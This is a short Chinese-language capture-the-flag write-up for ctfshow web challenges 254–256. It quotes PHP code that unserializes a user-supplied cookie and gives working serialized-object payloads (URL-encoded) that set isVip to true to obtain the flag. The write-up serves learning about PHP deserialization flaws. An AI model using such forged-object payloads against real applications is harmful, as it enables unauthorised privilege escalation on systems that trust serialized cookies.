web 254
和反序列化没啥关系,就是代码审计
payload:?username=xxxxxx&password=xxxxxx
web 255
账号密码的赋值和上面一样,就是多了一个cookie['user']
,用burp抓包解决
highlight_file(__FILE__);
include('flag.php');
class ctfShowUser{
public $username='xxxxxx';
public $password='xxxxxx';
public $isVip=false;
public function checkVip(){
return $this->isVip;
}
public function login($u,$p){
return $this->username===$u&&$this->password===$p;
}
public function vipOneKeyGetFlag(){
if($this->isVip){
global $flag;
echo "your flag is ".$flag;
}else{
echo "no vip, no flag";
}
}
}
$username=$_GET['username'];
$password=$_GET['password'];
if(isset($username) && isset($password)){
$user = unserialize($_COOKIE['user']);
if($user->login($username,$password)){
if($user->checkVip()){
$user->vipOneKeyGetFlag();
}
}else{
echo "no vip,no flag";
}
}
与上一题一样,需要满足$isVip=true
,不同的是看上去好像没有能让他为true的地方,这里就可以实例化一个对象,里面的isVIP是true,然后再序列化一下
<?php
class ctfShowUser{
public $isVip=true;
}
$a=new ctfShowUser();
echo serialize($a);
因为分号在cookie里会算作截断,所以用url编码一下,分号的编码是%3b
O:11:"ctfShowUser":1:{s:5:"isVip"%3bb:1%3b}
web 256
与上题一样需要实例化,不过需要加上账号密码的赋值,因为要满足账号密码不一样
<?php
class ctfShowUser{
public $username='a';
public $password='b';
public $isVip=true;
}
$a=new ctfShowUser();
echo serialize($a);
所以get提交/?username=a&password=b
cookie的值写这个
O:11:"ctfShowUser":3:{s:8:"username"%3bs:1:"a"%3bs:8:"password"%3bs:1:"b"%3bs:5:"isVip"%3bb:1;}